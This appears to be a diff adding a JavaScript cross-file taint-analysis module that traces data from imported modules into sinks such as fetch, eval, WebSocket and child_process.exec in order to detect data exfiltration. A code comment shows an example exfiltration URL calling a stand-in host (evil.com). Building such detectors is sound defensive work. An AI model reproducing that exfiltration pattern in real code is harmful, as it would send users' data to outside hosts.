+            localTaint[decl.id.name] = {
+              source: defTaint.source,
+              detail: defTaint.detail || '',
+              sourceFile: defTaint.sourceFile || resolved,
+            };
+          }
+          // Also mark any named-export access later via member expressions
+          // Store the module reference for named export resolution
+          localTaint['__module__' + decl.id.name] = { resolved, modTaint };
+        }
+        // const { getToken } = require('./utils')
+        if (decl.id.type === 'ObjectPattern') {
+          for (const prop of decl.id.properties) {
+            const key = prop.key && (prop.key.name || prop.key.value);
+            const localName = prop.value && prop.value.name;
+            if (key && localName && modTaint[key] && modTaint[key].tainted) {
+              localTaint[localName] = {
+                source: modTaint[key].source,
+                detail: modTaint[key].detail || '',
+                sourceFile: modTaint[key].sourceFile || resolved,
+              };
+            }
+          }
+        }
+      }
+    }
+  });
+  // Resolve member access, class instances, and method calls
+  walkAST(ast, (node) => {
+    if (node.type !== 'VariableDeclaration') return;
+    for (const decl of node.declarations) {
+      if (!decl.init || !decl.id || decl.id.type !== 'Identifier') continue;
+      // const c = new Collector() — propagate module ref to instance
+      if (decl.init.type === 'NewExpression' && decl.init.callee.type === 'Identifier') {
+        const modRef = localTaint['__module__' + decl.init.callee.name];
+        if (modRef) {
+          localTaint['__module__' + decl.id.name] = modRef;
+        }
+      }
+      // const data = reader.getData()  or  const data = reader.data
+      if (decl.init.type === 'MemberExpression' && decl.init.object.type === 'Identifier') {
+        const modRef = localTaint['__module__' + decl.init.object.name];
+        if (modRef) {
+          const propName = decl.init.property.name || decl.init.property.value;
+          if (modRef.modTaint[propName] && modRef.modTaint[propName].tainted) {
+            const t = modRef.modTaint[propName];
+            localTaint[decl.id.name] = {
+              source: t.source,
+              detail: t.detail || '',
+              sourceFile: t.sourceFile || modRef.resolved,
+            };
+          }
+        }
+      }
+      if (decl.init.type === 'CallExpression' && decl.init.callee.type === 'MemberExpression') {
+        const callee = decl.init.callee;
+        if (callee.object.type === 'Identifier') {
+          const modRef = localTaint['__module__' + callee.object.name];
+          if (modRef) {
+            const propName = callee.property.name || callee.property.value;
+            if (modRef.modTaint[propName] && modRef.modTaint[propName].tainted) {
+              const t = modRef.modTaint[propName];
+              localTaint[decl.id.name] = {
+                source: t.source,
+                detail: t.detail || '',
+                sourceFile: t.sourceFile || modRef.resolved,
+              };
+            }
+          }
+        }
+      }
+    }
+  });
+  // Clean up internal markers
+  for (const key of Object.keys(localTaint)) {
+    if (key.startsWith('__module__')) delete localTaint[key];
+  }
+  return localTaint;
+}
+/**
+ * Find sink calls in the AST that use a tainted variable as argument.
+ */
+function findSinksUsingTainted(ast, localTaint) {
+  const taintedNames = new Set(Object.keys(localTaint));
+  const sinks = [];
+  walkAST(ast, (node) => {
+    if (node.type !== 'CallExpression') return;
+    const sinkName = getSinkName(node);
+    if (!sinkName) return;
+    // Check if any argument references a tainted variable
+    const taintedArg = findTaintedArgument(node.arguments, taintedNames);
+    if (taintedArg) {
+      sinks.push({ sink: sinkName, taintedVar: taintedArg });
+    }
+  });
+  return sinks;
+}
+function getSinkName(callNode) {
+  const callee = callNode.callee;
+  // fetch(url), eval(code), WebSocket(url)
+  if (callee.type === 'Identifier' && SINK_CALLEE_NAMES.has(callee.name)) {
+    return `${callee.name}()`;
+  }
+  // https.request(...), child_process.exec(...)
+  if (callee.type === 'MemberExpression') {
+    const chain = getMemberChain(callee);
+    if (SINK_MEMBER_METHODS.has(chain)) {
+      return `${chain}()`;
+    }
+    // instance.connect(), socket.write(), ws.send()
+    const method = callee.property.name || callee.property.value;
+    if (SINK_INSTANCE_METHODS.has(method)) {
+      return `${method}()`;
+    }
+  }
+  // new WebSocket(url), new XMLHttpRequest()
+  if (callNode.type === 'NewExpression') {
+    if (callee.type === 'Identifier' && (callee.name === 'WebSocket' || callee.name === 'XMLHttpRequest')) {
+      return `new ${callee.name}()`;
+    }
+  }
+  return null;
+}
+function findTaintedArgument(args, taintedNames) {
+  if (!args) return null;
+  for (const arg of args) {
+    if (arg.type === 'Identifier' && taintedNames.has(arg.name)) {
+      return arg.name;
+    }
+    // Template literal: `https://evil.com/?d=${data}`
+    if (arg.type === 'TemplateLiteral') {
+      for (const expr of arg.expressions) {
+        if (expr.type === 'Identifier' && taintedNames.has(expr.name)) {
+          return expr.name;
+        }
+      }
+    }
+    // Concatenation: 'url' + data
+    if (arg.type === 'BinaryExpression' && arg.operator === '+') {
+      const left = findTaintedInExpr(arg.left, taintedNames);
+      if (left) return left;
+      const right = findTaintedInExpr(arg.right, taintedNames);
+      if (right) return right;
+    }
+    // Object: { body: data }
+    if (arg.type === 'ObjectExpression') {
+      for (const prop of arg.properties) {
+        if (prop.value && prop.value.type === 'Identifier' && taintedNames.has(prop.value.name)) {
+          return prop.value.name;
+        }
+      }
+    }
+  }
+  return null;
+}
+function findTaintedInExpr(node, taintedNames) {
+  if (node.type === 'Identifier' && taintedNames.has(node.name)) return node.name;
+  if (node.type === 'BinaryExpression' && node.operator === '+') {
+    return findTaintedInExpr(node.left, taintedNames) || findTaintedInExpr(node.right, taintedNames);
+  }
+  return null;
+}
+// =============================================================================
+// Shared helpers
+// =============================================================================
+function parseFile(filePath) {
+  let content;
+  try {
+    content = fs.readFileSync(filePath, 'utf8');
+  } catch {
+    return null;
+  }
+  try {
+    return acorn.parse(content, ACORN_OPTIONS);
+  } catch {
+    return null;
+  }
+}
+function walkAST(node, visitor) {
+  if (!node || typeof node !== 'object') return;
+  if (node.type) visitor(node);
+  for (const key of Object.keys(node)) {
+    if (key === 'type') continue;
+    const child = node[key];
+    if (Array.isArray(child)) {
+      for (const item of child) {
+        if (item && typeof item === 'object' && item.type) walkAST(item, visitor);
+      }
+    } else if (child && typeof child === 'object' && child.type) {
+      walkAST(child, visitor);
+    }
+  }
+}
+function isRequireCall(node) {
+  return (
+    node && node.type === 'CallExpression' &&
+    node.callee && node.callee.type === 'Identifier' &&
+    node.callee.name === 'require' &&
+    node.arguments.length === 1 &&
+    node.arguments[0].type === 'Literal' &&
+    typeof node.arguments[0].value === 'string'
+  );
+}
+function isLocalImport(spec) {
+  return spec.startsWith('./') || spec.startsWith('../');
+}
+function isModuleExportsAssign(node) {
+  if (node.type !== 'ExpressionStatement') return false;
+  const expr = node.expression;
+  if (expr.type !== 'AssignmentExpression' || expr.operator !== '=') return false;
+  const left = expr.left;
+  // module.exports = ...
+  if (left.type === 'MemberExpression' && left.object.type === 'Identifier' && left.object.name === 'module' &&
+      left.property.name === 'exports') return true;
+  // module.exports.foo = ...
+  if (left.type === 'MemberExpression' && left.object.type === 'MemberExpression' &&
+      left.object.object.type === 'Identifier' && left.object.object.name === 'module' &&
+      left.object.property.name === 'exports') return true;
+  // exports.foo = ...
+  if (left.type === 'MemberExpression' && left.object.type === 'Identifier' && left.object.name === 'exports') return true;
+  return false;
+}
+function getExportName(left) {
+  // module.exports = ... → 'default'
+  if (left.type === 'MemberExpression' && left.object.type === 'Identifier' && left.object.name === 'module') {
+    if (left.property.name === 'exports') return 'default';
+  }
+  // module.exports.foo = ... → 'foo'
+  if (left.type === 'MemberExpression' && left.object.type === 'MemberExpression') {
+    return left.property.name || left.property.value || 'default';
+  }
+  // exports.foo = ... → 'foo'
+  if (left.type === 'MemberExpression' && left.object.type === 'Identifier' && left.object.name === 'exports') {
+    return left.property.name || left.property.value || 'default';
+  }
+  return 'default';
+}
+function getFunctionBody(node) {
+  if (!node) return null;
+  if (node.type === 'FunctionExpression' || node.type === 'ArrowFunctionExpression') {
+    if (node.body.type === 'BlockStatement') return node.body.body;
+    // Arrow with expression body: () => expr
+    return [{ type: 'ReturnStatement', argument: node.body }];
+  }
+  return null;
+}
+function getMemberChain(node) {
+  if (node.type === 'Identifier') return node.name;
+  if (node.type === 'MemberExpression') {
+    const obj = getMemberChain(node.object);
+    const prop = node.property.name || node.property.value || '';
+    return `${obj}.${prop}`;
+  }
+  return '';
+}
+function extractLiteralArg(args) {
+  if (!args || args.length === 0) return '';
+  const first = args[0];
+  if (first.type === 'Literal' && typeof first.value === 'string') return first.value;
+  if (first.type === 'TemplateLiteral' && first.quasis.length === 1) return first.quasis[0].value.raw;
+  return '';
+}
+function resolveLocal(fileDir, spec, packagePath) {
+  const abs = path.resolve(fileDir, spec);
+  if (isFileExists(abs)) return toRel(abs, packagePath);
+  if (isFileExists(abs + '.js')) return toRel(abs + '.js', packagePath);
+  if (isFileExists(path.join(abs, 'index.js'))) return toRel(path.join(abs, 'index.js'), packagePath);
+  return null;
+}
+function isFileExists(p) {
+  try { return fs.statSync(p).isFile(); } catch { return false; }
+}
+function toRel(abs, packagePath) {
+  return path.relative(packagePath, abs).replace(/\\/g, '/');
+}
+module.exports = { buildModuleGraph, annotateTaintedExports, detectCrossFileFlows };